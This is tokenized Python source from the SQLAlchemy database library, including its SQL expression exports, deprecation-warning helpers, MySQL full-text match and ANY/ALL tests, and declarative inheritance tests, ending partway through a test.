<s> from . expression import ( <EOL> Alias , <EOL> ClauseElement , <EOL> ColumnCollection , <EOL> ColumnElement , <EOL> CompoundSelect , <EOL> Delete , <EOL> FromClause , <EOL> Insert , <EOL> Join , <EOL> Select , <EOL> Selectable , <EOL> TableClause , <EOL> Update , <EOL> alias , <EOL> and_ , <EOL> any_ , <EOL> all_ , <EOL> asc , <EOL> between , <EOL> bindparam , <EOL> case , <EOL> cast , <EOL> collate , <EOL> column , <EOL> delete , <EOL> desc , <EOL> distinct , <EOL> except_ , <EOL> except_all , <EOL> exists , <EOL> extract , <EOL> false , <EOL> False_ , <EOL> func , <EOL> funcfilter , <EOL> insert , <EOL> intersect , <EOL> intersect_all , <EOL> join , <EOL> label , <EOL> lateral , <EOL> literal , <EOL> literal_column , <EOL> modifier , <EOL> not_ , <EOL> null , <EOL> or_ , <EOL> outerjoin , <EOL> outparam , <EOL> over , <EOL> select , <EOL> subquery , <EOL> table , <EOL> text , <EOL> true , <EOL> True_ , <EOL> tuple_ , <EOL> type_coerce , <EOL> union , <EOL> union_all , <EOL> update , <EOL> within_group <EOL> ) <EOL> from . visitors import ClauseVisitor <EOL> def __go ( lcls ) : <EOL> global __all__ <EOL> from . . import util as _sa_util <EOL> import inspect as _inspect <EOL> __all__ = sorted ( name for name , obj in lcls . items ( ) <EOL> if not ( name . startswith ( '<STR_LIT:_>' ) or _inspect . ismodule ( obj ) ) ) <EOL> from . annotation import _prepare_annotations , Annotated <EOL> from . elements import AnnotatedColumnElement , ClauseList <EOL> from . selectable import AnnotatedFromClause <EOL> _prepare_annotations ( ColumnElement , AnnotatedColumnElement ) <EOL> _prepare_annotations ( FromClause , AnnotatedFromClause ) <EOL> _prepare_annotations ( ClauseList , Annotated ) <EOL> _sa_util . dependencies . resolve_all ( "<STR_LIT>" ) <EOL> from . import naming <EOL> __go ( locals ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . . util import py33 <EOL> if py33 : <EOL> from unittest . mock import MagicMock , Mock , call , patch , ANY <EOL> else : <EOL> try : <EOL> from mock import MagicMock , Mock , call , patch , ANY <EOL> except ImportError : <EOL> raise ImportError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from . . import exc <EOL> import warnings <EOL> import re <EOL> from . langhelpers import decorator <EOL> def warn_deprecated ( msg , stacklevel = <NUM_LIT:3> ) : <EOL> warnings . warn ( msg , exc . SADeprecationWarning , stacklevel = stacklevel ) <EOL> def warn_pending_deprecation ( msg , stacklevel = <NUM_LIT:3> ) : <EOL> warnings . warn ( msg , exc . SAPendingDeprecationWarning , stacklevel = stacklevel ) <EOL> def deprecated ( version , message = None , add_deprecation_to_docstring = True ) : <EOL> """<STR_LIT>""" <EOL> if add_deprecation_to_docstring : <EOL> header = "<STR_LIT>" % ( version , ( message or '<STR_LIT>' ) ) <EOL> else : <EOL> header = None <EOL> if message is None : <EOL> message = "<STR_LIT>" <EOL> def decorate ( fn ) : <EOL> return _decorate_with_warning ( <EOL> fn , exc . SADeprecationWarning , <EOL> message % dict ( func = fn . __name__ ) , header ) <EOL> return decorate <EOL> def pending_deprecation ( version , message = None , <EOL> add_deprecation_to_docstring = True ) : <EOL> """<STR_LIT>""" <EOL> if add_deprecation_to_docstring : <EOL> header = "<STR_LIT>" % ( version , ( message or '<STR_LIT>' ) ) <EOL> else : <EOL> header = None <EOL> if message is None : <EOL> message = "<STR_LIT>" <EOL> def decorate ( fn ) : <EOL> return _decorate_with_warning ( <EOL> fn , exc . SAPendingDeprecationWarning , <EOL> message % dict ( func = fn . __name__ ) , header ) <EOL> return decorate <EOL> def _sanitize_restructured_text ( text ) : <EOL> def repl ( m ) : <EOL> type_ , name = m . group ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> if type_ in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> name += "<STR_LIT>" <EOL> return name <EOL> return re . sub ( r'<STR_LIT>' , repl , text ) <EOL> def _decorate_with_warning ( func , wtype , message , docstring_header = None ) : <EOL> """<STR_LIT>""" <EOL> message = _sanitize_restructured_text ( message ) <EOL> @ decorator <EOL> def warned ( fn , * args , ** kwargs ) : <EOL> warnings . 
warn ( message , wtype , stacklevel = <NUM_LIT:3> ) <EOL> return fn ( * args , ** kwargs ) <EOL> doc = func . __doc__ is not None and func . __doc__ or '<STR_LIT>' <EOL> if docstring_header is not None : <EOL> docstring_header %= dict ( func = func . __name__ ) <EOL> doc = inject_docstring_text ( doc , docstring_header , <NUM_LIT:1> ) <EOL> decorated = warned ( func ) <EOL> decorated . __doc__ = doc <EOL> return decorated <EOL> import textwrap <EOL> def _dedent_docstring ( text ) : <EOL> split_text = text . split ( "<STR_LIT:\n>" , <NUM_LIT:1> ) <EOL> if len ( split_text ) == <NUM_LIT:1> : <EOL> return text <EOL> else : <EOL> firstline , remaining = split_text <EOL> if not firstline . startswith ( "<STR_LIT:U+0020>" ) : <EOL> return firstline + "<STR_LIT:\n>" + textwrap . dedent ( remaining ) <EOL> else : <EOL> return textwrap . dedent ( text ) <EOL> def inject_docstring_text ( doctext , injecttext , pos ) : <EOL> doctext = _dedent_docstring ( doctext or "<STR_LIT>" ) <EOL> lines = doctext . split ( '<STR_LIT:\n>' ) <EOL> injectlines = textwrap . dedent ( injecttext ) . split ( "<STR_LIT:\n>" ) <EOL> if injectlines [ <NUM_LIT:0> ] : <EOL> injectlines . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> blanks = [ num for num , line in enumerate ( lines ) if not line . strip ( ) ] <EOL> blanks . insert ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> inject_pos = blanks [ min ( pos , len ( blanks ) - <NUM_LIT:1> ) ] <EOL> lines = lines [ <NUM_LIT:0> : inject_pos ] + injectlines + lines [ inject_pos : ] <EOL> return "<STR_LIT:\n>" . join ( lines ) </s>
<s> from sqlalchemy . testing import eq_ , is_ <EOL> from sqlalchemy import * <EOL> from sqlalchemy . testing import fixtures <EOL> from sqlalchemy import testing <EOL> class IdiosyncrasyTest ( fixtures . TestBase ) : <EOL> __only_on__ = '<STR_LIT>' <EOL> __backend__ = True <EOL> @ testing . emits_warning ( ) <EOL> def test_is_boolean_symbols_despite_no_native ( self ) : <EOL> is_ ( <EOL> testing . db . scalar ( select ( [ cast ( true ( ) . is_ ( true ( ) ) , Boolean ) ] ) ) , <EOL> True <EOL> ) <EOL> is_ ( <EOL> testing . db . scalar ( select ( [ cast ( true ( ) . isnot ( true ( ) ) , Boolean ) ] ) ) , <EOL> False <EOL> ) <EOL> is_ ( <EOL> testing . db . scalar ( select ( [ cast ( false ( ) . is_ ( false ( ) ) , Boolean ) ] ) ) , <EOL> True <EOL> ) <EOL> class MatchTest ( fixtures . TestBase ) : <EOL> __only_on__ = '<STR_LIT>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def setup_class ( cls ) : <EOL> global metadata , cattable , matchtable <EOL> metadata = MetaData ( testing . db ) <EOL> cattable = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:description>' , String ( <NUM_LIT:50> ) ) , <EOL> mysql_engine = '<STR_LIT>' <EOL> ) <EOL> matchtable = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:title>' , String ( <NUM_LIT:200> ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> mysql_engine = '<STR_LIT>' <EOL> ) <EOL> metadata . create_all ( ) <EOL> cattable . insert ( ) . execute ( [ <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:description>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:description>' : '<STR_LIT>' } , <EOL> ] ) <EOL> matchtable . insert ( ) . 
execute ( [ <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , <EOL> '<STR_LIT:title>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> } <EOL> ] ) <EOL> @ classmethod <EOL> def teardown_class ( cls ) : <EOL> metadata . drop_all ( ) <EOL> def test_simple_match ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ r . id for r in results ] ) <EOL> def test_not_match ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( ~ matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] , [ r . id for r in results ] ) <EOL> def test_simple_match_with_apostrophe ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( "<STR_LIT>" ) ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:3> ] , [ r . id for r in results ] ) <EOL> def test_return_value ( self ) : <EOL> result = testing . db . execute ( <EOL> select ( [ <EOL> matchtable . c . title . match ( '<STR_LIT>' ) . label ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) . label ( '<STR_LIT>' ) , <EOL> matchtable . c . title <EOL> ] ) . order_by ( matchtable . c . id ) <EOL> ) . 
fetchall ( ) <EOL> eq_ ( <EOL> result , <EOL> [ <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> def test_or_match ( self ) : <EOL> results1 = ( matchtable . select ( ) . <EOL> where ( or_ ( matchtable . c . title . match ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ r . id for r in results1 ] ) <EOL> results2 = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ r . id for r in results2 ] ) <EOL> def test_and_match ( self ) : <EOL> results1 = ( matchtable . select ( ) . <EOL> where ( and_ ( matchtable . c . title . match ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) ) ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:5> ] , [ r . id for r in results1 ] ) <EOL> results2 = ( matchtable . select ( ) . <EOL> where ( matchtable . c . title . match ( '<STR_LIT>' ) ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:5> ] , [ r . id for r in results2 ] ) <EOL> def test_match_across_joins ( self ) : <EOL> results = ( matchtable . select ( ) . <EOL> where ( and_ ( cattable . c . id == matchtable . c . category_id , <EOL> or_ ( cattable . c . description . match ( '<STR_LIT>' ) , <EOL> matchtable . c . title . match ( '<STR_LIT>' ) ) ) ) . <EOL> order_by ( matchtable . c . id ) . <EOL> execute ( ) . <EOL> fetchall ( ) ) <EOL> eq_ ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ r . 
id for r in results ] ) <EOL> class AnyAllTest ( fixtures . TablesTest ) : <EOL> __only_on__ = '<STR_LIT>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:value>' , Integer ) <EOL> ) <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> stuff = cls . tables . stuff <EOL> testing . db . execute ( <EOL> stuff . insert ( ) , <EOL> [ <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:value>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:value>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:value>' : <NUM_LIT:3> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:value>' : <NUM_LIT:4> } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:value>' : <NUM_LIT:5> } , <EOL> ] <EOL> ) <EOL> def test_any_w_comparator ( self ) : <EOL> stuff = self . tables . stuff <EOL> stmt = select ( [ stuff . c . id ] ) . where ( <EOL> stuff . c . value > any_ ( select ( [ stuff . c . value ] ) ) ) <EOL> eq_ ( <EOL> testing . db . execute ( stmt ) . fetchall ( ) , <EOL> [ ( <NUM_LIT:2> , ) , ( <NUM_LIT:3> , ) , ( <NUM_LIT:4> , ) , ( <NUM_LIT:5> , ) ] <EOL> ) <EOL> def test_all_w_comparator ( self ) : <EOL> stuff = self . tables . stuff <EOL> stmt = select ( [ stuff . c . id ] ) . where ( <EOL> stuff . c . value >= all_ ( select ( [ stuff . c . value ] ) ) ) <EOL> eq_ ( <EOL> testing . db . execute ( stmt ) . fetchall ( ) , <EOL> [ ( <NUM_LIT:5> , ) ] <EOL> ) <EOL> def test_any_literal ( self ) : <EOL> stuff = self . tables . stuff <EOL> stmt = select ( [ <NUM_LIT:4> == any_ ( select ( [ stuff . c . value ] ) ) ] ) <EOL> is_ ( <EOL> testing . db . execute ( stmt ) . scalar ( ) , True <EOL> ) </s>
<s> from sqlalchemy . testing import eq_ , assert_raises , assert_raises_message , is_ <EOL> from sqlalchemy . ext import declarative as decl <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import testing <EOL> from sqlalchemy import Integer , String , ForeignKey <EOL> from sqlalchemy . testing . schema import Table , Column <EOL> from sqlalchemy . orm import relationship , create_session , class_mapper , configure_mappers , clear_mappers , polymorphic_union , deferred , Session <EOL> from sqlalchemy . ext . declarative import declared_attr , AbstractConcreteBase , ConcreteBase , has_inherited_table <EOL> from sqlalchemy . testing import fixtures , mock <EOL> Base = None <EOL> class DeclarativeTestBase ( fixtures . TestBase , testing . AssertsExecutionResults ) : <EOL> def setup ( self ) : <EOL> global Base <EOL> Base = decl . declarative_base ( testing . db ) <EOL> def teardown ( self ) : <EOL> Session . close_all ( ) <EOL> clear_mappers ( ) <EOL> Base . metadata . drop_all ( ) <EOL> class DeclarativeInheritanceTest ( DeclarativeTestBase ) : <EOL> def test_we_must_copy_mapper_args ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class Engineer ( Person ) : <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert '<STR_LIT>' not in Person . __mapper_args__ <EOL> assert class_mapper ( Engineer ) . polymorphic_identity is None <EOL> assert class_mapper ( Engineer ) . polymorphic_on is Person . __table__ . c . 
type <EOL> def test_we_must_only_copy_column_mapper_args ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> a = Column ( Integer ) <EOL> b = Column ( Integer ) <EOL> c = Column ( Integer ) <EOL> d = Column ( Integer ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:a>' , <EOL> '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:id>' , '<STR_LIT:a>' , '<STR_LIT:b>' ] , <EOL> } <EOL> assert class_mapper ( Person ) . version_id_col == '<STR_LIT:a>' <EOL> assert class_mapper ( Person ) . include_properties == set ( [ '<STR_LIT:id>' , '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def test_custom_join_condition ( self ) : <EOL> class Foo ( Base ) : <EOL> __tablename__ = '<STR_LIT:foo>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> class Bar ( Foo ) : <EOL> __tablename__ = '<STR_LIT:bar>' <EOL> bar_id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> foo_id = Column ( '<STR_LIT>' , Integer ) <EOL> __mapper_args__ = { '<STR_LIT>' : foo_id == Foo . id } <EOL> configure_mappers ( ) <EOL> def test_joined ( self ) : <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . 
ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> primary_language = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> golf_swing = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> c1 = Company ( <EOL> name = '<STR_LIT>' , <EOL> employees = [ <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) ] ) <EOL> c2 = Company ( name = '<STR_LIT>' , <EOL> employees = [ Engineer ( name = '<STR_LIT>' , <EOL> primary_language = '<STR_LIT>' ) ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> eq_ ( <EOL> Manager . id . property . columns , <EOL> [ Manager . __table__ . c . id , Person . __table__ . c . id ] <EOL> ) <EOL> sess . 
expunge_all ( ) <EOL> def go ( ) : <EOL> assert sess . query ( Manager ) . filter ( Manager . name == '<STR_LIT>' <EOL> ) . one ( ) . id <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> assert sess . query ( Person ) . filter ( Manager . name == '<STR_LIT>' <EOL> ) . one ( ) . id <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_add_subcol_after_the_fact ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> Engineer . primary_language = Column ( '<STR_LIT>' , <EOL> String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> sess . add ( e1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . first ( ) , <EOL> Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> def test_add_parentcol_after_the_fact ( self ) : <EOL> class Person ( Base , fixtures . 
ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> Person . name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> sess . add ( e1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . first ( ) , <EOL> Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> def test_add_sub_parentcol_after_the_fact ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> class Admin ( Engineer ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> workstation = Column ( String ( <NUM_LIT:50> ) ) <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> Person . 
name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Admin ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' , <EOL> workstation = '<STR_LIT:foo>' ) <EOL> sess . add ( e1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . first ( ) , <EOL> Admin ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' , workstation = '<STR_LIT:foo>' ) ) <EOL> def test_subclass_mixin ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class MyMixin ( object ) : <EOL> pass <EOL> class Engineer ( MyMixin , Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> primary_language = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> assert class_mapper ( Engineer ) . 
inherits is class_mapper ( Person ) <EOL> def test_with_undefined_foreignkey ( self ) : <EOL> class Parent ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> tp = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = dict ( polymorphic_on = tp ) <EOL> class Child1 ( Parent ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> related_child2 = Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> __mapper_args__ = dict ( polymorphic_identity = '<STR_LIT>' ) <EOL> class Child2 ( Parent ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> related_child1 = Column ( '<STR_LIT>' , Integer ) <EOL> __mapper_args__ = dict ( polymorphic_identity = '<STR_LIT>' ) <EOL> sa . orm . configure_mappers ( ) <EOL> def test_foreign_keys_with_col ( self ) : <EOL> """<STR_LIT>""" <EOL> class Booking ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class PlanBooking ( Booking ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( Booking . id ) , <EOL> primary_key = True ) <EOL> class FeatureBooking ( Booking ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( Booking . id ) , <EOL> primary_key = True ) <EOL> plan_booking_id = Column ( Integer , <EOL> ForeignKey ( PlanBooking . id ) ) <EOL> plan_booking = relationship ( PlanBooking , <EOL> backref = '<STR_LIT>' ) <EOL> assert FeatureBooking . __table__ . c . plan_booking_id . references ( PlanBooking . __table__ . c . id ) <EOL> assert FeatureBooking . __table__ . c . id . references ( Booking . __table__ . c . id ) <EOL> def test_single_colsonbase ( self ) : <EOL> """<STR_LIT>""" <EOL> class Company ( Base , fixtures . 
ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> Base . metadata . create_all ( ) 